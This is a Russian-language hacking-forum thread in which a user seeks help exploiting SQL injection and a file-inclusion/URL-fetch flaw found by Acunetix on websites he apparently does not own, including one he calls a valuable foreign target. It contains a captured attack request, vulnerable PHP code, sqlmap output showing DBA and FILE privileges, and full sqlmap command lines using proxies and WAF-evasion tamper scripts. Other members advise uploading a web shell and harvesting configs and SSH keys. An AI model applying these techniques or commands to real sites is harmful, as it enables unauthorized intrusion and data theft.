acunetix профиль

[ConnectXSS]

Как максимально профитно можно настроить профиль?
Используется acunetix только для поиск sql
Если выбрать профиль High Risk Vulnerabilities выводит много шлака.

какие еще есть уязвимости в acunetix профиле через которые можно попасть в админку или залить шелл ну или получить доступ к сайту?

 

[ConnectXSS]

Окунь нашел File inclusion,через эту уязвимость можно залить шел?
как это можно сделать на данном примере?помогите разобраться

POST /optin.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: _icl_current_language=en;wordpress_test_cookie=WP+Cookie+check;wp-settings-0=+;wp-settings-time-0=+;wp-postpass_92fbf3142039a9350f471c96df=%24P%24BsFL3O3mDUQjco83mZ%2FRu%2Fc4mUhjj0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 112
Host: сайт.ком
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive

26241823=289&OptinFormID=5&UEmail=sample%40email.tst&field32=yes&field34=0&field6=GRLpGpAG&forward_url=optin.php

<?php
    if ($_POST && isset($_POST['forward_url'])) {
        $url = $_POST['forward_url'];
        unset($_POST['forward_url']);

        $params = array(
            'http' => array(
                'method' => 'POST',
                'content' => http_build_query($_POST)
            )
        );

        $ctx = stream_context_create($params);
        $fp = @fopen($url, 'rb', false, $ctx);

        if ($fp) {
            echo @stream_get_contents($fp);
            die();
        }
    }

    header('Location: https://******.**');
    die();

 

[trixter]

Тебе нужно искать любые критические данные. Это все конфиги, доступ к бд (какая цмс), у юзеров иногда в папках лежат ключи ssh. Потом с помощью собранной информации ты можешь дальше двигаться. Также надо посмотреть по каким юзером ты и какие у тебя права.

 

[ConnectXSS]

Тебе нужно искать любые критические данные. Это все конфиги, доступ к бд (какая цмс), у юзеров иногда в папках лежат ключи ssh. Потом с помощью собранной информации ты можешь дальше двигаться. Также надо посмотреть по каким юзером ты и какие у тебя права.

я ставил High Risk Vulnerabilities выводились всякие Cross Site Scripting (XSS)
username enumeration
и тп

Также надо посмотреть по каким юзером ты и какие у тебя права

допустим вот сейчас есть sql
back-end DBMS: MySQL >= 5.0.0 (Percona fork)
banner: '5.7.34-37-log'
current user: 'rpm@%'
current database: 'rpm_*****_com'
current user is DBA: True

current user: 'rpm@%'

[*] %rpm% (administrator) [28]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TABLESPACE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE

дальше ступор,что можно сделать с этими данными?

 

[xanthopsia]

Так нужно понимать, как эти уязвимости вообще работают, а не просто закидывать в сканер и думать что он все сделает за тебя. Читай, проходи лабы хотя бы по sql injection

 

[ConnectXSS]

Так нужно понимать, как эти уязвимости вообще работают, а не просто закидывать в сканер и думать что он все сделает за тебя. Читай, проходи лабы хотя бы по sql injection

ни кто не думает что он сделает все за тебя.если ты решил пофлудить ,плз не здесь.

 

[trixter]

я ставил High Risk Vulnerabilities выводились всякие Cross Site Scripting (XSS)
username enumeration
и тп




допустим вот сейчас есть sql
back-end DBMS: MySQL >= 5.0.0 (Percona fork)
banner: '5.7.34-37-log'
current user: 'rpm@%'
current database: 'rpm_*****_com'
current user is DBA: True

current user: 'rpm@%'

[*] %rpm% (administrator) [28]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TABLESPACE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE

дальше ступор,что можно сделать с этими данными?

Ты сначала написал про LFI, я тебе дал наводку. Это довольно серьезная дырка. Окунь просто сканирует то на что запрограммирован, дает вектор. Так любая атака состоит из несколько шагов, за редким исключением. Окунь очень хорошо кравлит, позволяет быстро создать карту приложения. Чтоб не наводить много шума его работой дальше нужно ручками и головой работать. По поводу sql, у тебя почти полные привилегии, можешь читать файлы, можешь изменять инфу в бд, можешь попробовать залить шелл.

 

[ConnectXSS]

Ты сначала написал про LFI, я тебе дал наводку. Это довольно серьезная дырка. Окунь просто сканирует то на что запрограммирован, дает вектор. Так любая атака состоит из несколько шагов, за редким исключением. Окунь очень хорошо кравлит, позволяет быстро создать карту приложения. Чтоб не наводить много шума его работой дальше нужно ручками и головой работать. По поводу sql, у тебя почти полные привилегии, можешь читать файлы, можешь изменять инфу в бд, можешь попробовать залить шелл.

сори,но сможешь помочь с данной sql?это очень ценный забугор ресурс ,если поможешь напишу подробности

 

[ConnectXSS]

а что дает эта инфа в acunetix?можно ли с этой инфой ускорить раскрытие бд в sqlmap?

Ты сначала написал про LFI, я тебе дал наводку. Это довольно серьезная дырка. Окунь просто сканирует то на что запрограммирован, дает вектор. Так любая атака состоит из несколько шагов, за редким исключением. Окунь очень хорошо кравлит, позволяет быстро создать карту приложения. Чтоб не наводить много шума его работой дальше нужно ручками и головой работать. По поводу sql, у тебя почти полные привилегии, можешь читать файлы, можешь изменять инфу в бд, можешь попробовать залить шелл.

Tests performed:

• -1 OR 2+985-985-1=0+0+0+1 -- => TRUE
• -1 OR 3+985-985-1=0+0+0+1 -- => FALSE
• -1 OR 3*2<(0+5+985-985) -- => FALSE
• -1 OR 3*2>(0+5+985-985) -- => FALSE
• -1 OR 2+1-1-1=1 AND 000985=000985 -- => TRUE
• -1 OR 000985=000985 AND 3+1-1-1=1 -- => FALSE
• -1 OR 3*2=5 AND 000985=000985 -- => FALSE
• -1 OR 3*2=6 AND 000985=000985 -- => TRUE
• -1 OR 3*2*0=6 AND 000985=000985 -- => FALSE
• -1 OR 3*2*1=6 AND 000985=000985 -- => TRUE

 

[ConnectXSS]

люди добрые,подскажите на глаз можно определить раскроется скуля в sqlmap или нет?
по Attack Details в sqlmap?

 

[xanthopsia]

люди добрые,подскажите на глаз можно определить раскроется скуля в sqlmap или нет?
по Attack Details в sqlmap?

Вот нет же, вместо того, чтобы вязть почитать, разобратся как они работают, будешь кидать каждый репорт сканера в топик и надеяться что тебе всё ложкой в рот запихнут. Sqlmap обычно проверяет на false positive, поэтому если он показывает что есть уязвимость, 99% что всё заебись. Sqlmap также дает возможность самому выбирать пейлоуд и куда инжектить, можешь пробовать раскручивать ту х#йню которую акунетикс показал. еще зависит есть ли WAF на сайте. В общем, если ты настолько простую инфу не можешь найти, не стоит пока лезть, если на бутылку не решил присесть

 

[adamjester]

Скулю раскрути и sqlmap все выдаст ,а окунь даёт тебе лишь тропинку в какую сторону крутить и все

 

[adamjester]

Почитай про temper и все поймешь

 

[ConnectXSS]

Вот нет же, вместо того, чтобы вязть почитать, разобратся как они работают, будешь кидать каждый репорт сканера в топик и надеяться что тебе всё ложкой в рот запихнут. Sqlmap обычно проверяет на false positive, поэтому если он показывает что есть уязвимость, 99% что всё заебись. Sqlmap также дает возможность самому выбирать пейлоуд и куда инжектить, можешь пробовать раскручивать ту х#йню которую акунетикс показал. еще зависит есть ли WAF на сайте. В общем, если ты настолько простую инфу не можешь найти, не стоит пока лезть, если на бутылку не решил присесть

из за таких как ты, как раз таки сложно почитать,понять и разобраться.
вместо того чтобы фантазировать обо мне ,мог бы помочь дельным советом,повторюсь,не флуди плз ты 2 раза уже написал одно и тоже ,не хочу отвечать тебе в 3 раз.

 

[ConnectXSS]

Скулю раскрути и sqlmap все выдаст ,а окунь даёт тебе лишь тропинку в какую сторону крутить и все

очень много скуль не раскручивается,думаю может я много линков теряю ?!
ок.скажу иначе.
Когда acunetix находит скулю,стандартно кидаю в sqlmap команду

sqlmap -r /home/win/3.txt -technique="BEUT" -p "blabla" --random-agent -proxy=socks5://******** --no-cast -batch --risk=3 --level=5 --dbms=mysql tamper=space2comment,randomcase,between --no-cast --answers=you want to continue?=y,crack=n,optimize=Y -dbs -batch -threads=10

ничего не меняю ,если только техники и потоки.
+ хочу ускорить процесс раскрытия скуль,как это можно сделать имея инфу от acunetix ,чтоб линки не крутилось в холостую?
+если подряд идут ошибки при раскрутке в sqlmap например

[INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[02:24:54] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s)
[02:26:29] [CRITICAL] connection timed out to the target URL or proxy
[02:27:01] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s)
[02:28:36] [CRITICAL] connection timed out to the target URL or proxy
[02:29:09] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s)
[02:30:44] [CRITICAL] connection timed out to the target URL or proxy
[02:31:16] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s)

что нужно сделать?
может ли помочь --safe-ur, если такие ошибки?читал в гугле про --safe-ur ,нашел такую инфу
-safe-url: Обеспечивает безопасное и безошибочное соединение и время от времени посещает его.
-safe-freq: Обеспечивает безопасное и безошибочное соединение. После каждого тестового запроса безопасное соединение будет снова доступно
не оч понимаю ,для чего это нужно?

еще нарыл такую инфу про level,risk

По умолчанию sqlmap проверяет все параметры GET и POST. Если значение --level больше или равно 2, он также проверяет значение заголовка HTTP Cookie. Если он больше или равен 3, он также проверяет значение заголовка User-Agent и HTTP Referer.

как я понял если скуля в GET или Post нужно ставить level=1
если скуля в HTTP Cookie то -level=2
если в User-Agent и HTTP Referer -level=3
я сомневаюсь в этом ,исправьте меня если я не прав?!просто я кручу по максималке с level,risk,могут ли из за этого некоторые скули не раскрываться?

 

[trixter]

очень много скуль не раскручивается,думаю может я много линков теряю ?!
ок.скажу иначе.
Когда acunetix находит скулю,стандартно кидаю в sqlmap команду


ничего не меняю ,если только техники и потоки.
+ хочу ускорить процесс раскрытия скуль,как это можно сделать имея инфу от acunetix ,чтоб линки не крутилось в холостую?
+если подряд идут ошибки при раскрутке в sqlmap например

что нужно сделать?
может ли помочь --safe-ur, если такие ошибки?читал в гугле про --safe-ur ,нашел такую инфу
-safe-url: Обеспечивает безопасное и безошибочное соединение и время от времени посещает его.
-safe-freq: Обеспечивает безопасное и безошибочное соединение. После каждого тестового запроса безопасное соединение будет снова доступно
не оч понимаю ,для чего это нужно?

еще нарыл такую инфу про level,risk

как я понял если скуля в GET или Post нужно ставить level=1
если скуля в HTTP Cookie то -level=2
если в User-Agent и HTTP Referer -level=3
я сомневаюсь в этом ,исправьте меня если я не прав?!просто я кручу по максималке с level,risk,могут ли из за этого некоторые скули не раскрываться?

1. Окунь тебе показывает уязвимый параметр. Его берешь и для быстрой проверки:

sqlmap -r ~/request --level=3 --risk=5 -p parametr --technique="тот тип уязвимости что показал окунь" или все "BETQUS"

2. Если ошибки то уменьшай количесво потоков, делай больше таймауты, используй тамперы (на гитхабе есть попадаються частные тамперы), скорее есть waf встроенный или внешний. waf можно определить с помощью скриптов или в браузере дополнение "wappalyzer"

 

[adamjester]

1. Окунь тебе показывает уязвимый параметр. Его берешь и для быстрой проверки:

sqlmap -r ~/request --level=3 --risk=5 -p parametr --technique="тот тип уязвимости что показал окунь" или все "BETQUS"

2. Если ошибки то уменьшай количесво потоков, делай больше таймауты, используй тамперы (на гитхабе есть попадаються частные тамперы), скорее есть waf встроенный или внешний. waf можно определить с помощью скриптов или в браузере дополнение "wappalyzer"

+

 

[ConnectXSS]

1. Окунь тебе показывает уязвимый параметр. Его берешь и для быстрой проверки:

sqlmap -r ~/request --level=3 --risk=5 -p parametr --technique="тот тип уязвимости что показал окунь" или все "BETQUS"

2. Если ошибки то уменьшай количесво потоков, делай больше таймауты, используй тамперы (на гитхабе есть попадаються частные тамперы), скорее есть waf встроенный или внешний. waf можно определить с помощью скриптов или в браузере дополнение "wappalyzer"

1. а разьве не может быть такого ,что окунь например увидел болеан или тайм,а на деле это еррор?
2.по поводу темперов ,я скачал "wappalyzer" в браузер как там определить waf?
+если я найду waf как мне потом найти под него темпер не понятно..

 

[ConnectXSS]

Зачем он тебе нужен?
Бери burp suite pro, навешай расширений и работай вручную. Есть интеграция sqlmap прямо в burp.
Или почитай /threads/56455/ тут уже подробная инструкция, но с netsparker.

Или есть вот такие продукты /threads/35580/ (не очень) и /threads/35380/ (сам хочу взять) пока аналогов не видел. Если хочешь просто закинуть пачку хостов и на удачу что-то ловить. Но гораздо больше профита будет с burp suite.

очень интересно,а в бурп тоже можно пачкой кидать линки?сколько за раз и что прям заметная разница с окунем?

 

[ConnectXSS]

Можно, но нет смысла, как и в acunetix.


Заметная конечно. В burp ты сам вручную работаешь.

1. почему нет смысла?
2.если я крутил линки только в sqlmap(не руками)я смогу работать в burp?просто краем глаза читал что если не разбираешся в составлении запросов руками то очень сложно разобраться..или это миф?)